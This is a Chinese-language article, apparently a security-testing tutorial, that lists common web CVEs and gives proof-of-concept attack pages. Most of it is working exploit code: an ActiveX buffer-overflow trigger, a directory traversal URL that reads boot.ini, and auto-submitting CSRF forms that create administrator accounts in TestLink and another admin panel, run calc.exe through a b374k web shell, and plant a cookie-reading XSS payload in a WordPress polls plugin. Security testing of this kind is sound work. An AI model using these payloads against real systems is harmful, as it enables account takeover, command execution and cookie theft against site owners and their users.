實務常見網站弱點CVE與測試攻擊範例

實務常見網站弱點CVE與測試攻擊範例

這篇文章主要介紹幾個實際網站弱點的個案與範例程式。

這些範例測試程式都是實際產品所發生的弱點。

筆者用這些例子說明在安全測試中，

如何運用這些測試技巧加入這些測試個案，防止產品有這樣的弱點。

常見的網站CVE

• File path traversal CVE-2013-2678
•  Cross-site scripting (reflected) CVE-2013-2679
•  Cleartext submission of password CVE-2013-2680
•  Password field with autocomplete enabled CVE-2013-2681
•  Frameable response (Clickjacking) CVE-2013-2682
•  Private IP addresses disclosed CVE-2013-2683
•  HTML does not specify charset CVE-2013-2684

Blind SQL injection 測試範例

ActiveX control Buffer overflow 測試範例

[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]

<!-- saved from url=(0014)about:internet --> 
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
    x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>

[/pastacode]

Reflected XSS測試範例

Directory traversal測試範例

http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

CSRF 攻擊的測試範例

Http Post 就不會受到CSRF攻擊嗎? 這個迷思是錯的!

看看下列這幾個”實際”的例子，CSRF甚至可以用來做 command 執行與系統管理員帳號的建立。

CSRF 與 JavaScript 其實並列網站攻擊嚴重性之首。

[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]

<html lang="en">
<head>
<title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
<form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_login" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="firstName" value="new_administrator_fname" />
<input type="hidden" name="lastName" value="new_administrator_lname" />
<input type="hidden" name="password" value="new_administrator_password" />
<input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
<input type="hidden" name="rights_id" value="8" />
<input type="hidden" name="locale" value="en_GB" />
<input type="hidden" name="authentication" value="" />
<input type="hidden" name="user_is_active" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="do_update" value="Save" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
 

[/pastacode]

[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]

<form id='ABYSMALGODS' action='
http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes'
method='post'>
<input id='cmd' type='text' name='terminalInput' value='calc.exe' />
<script>document.getElementById('ABYSMALGODS').submit()</script>
</form>

[/pastacode]

[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]

<html>
    <body onload="javascript:document.forms[0].submit()">
    <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
    <input type="hidden" name="action" value="p_add" />
    <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
    <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
    <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
    <input type="submit" name="submit" value="Submit" class="button" />
    </form>
</html>

[/pastacode]

[pastacode lang=”markup” message=”” highlight=”” provider=”manual”]

 <html>
This is CSRF testing sample for POST.
The POST hidden variables listed below may change based on the target website.

  <body>
    <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
      <input type="hidden" name="kadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[/pastacode]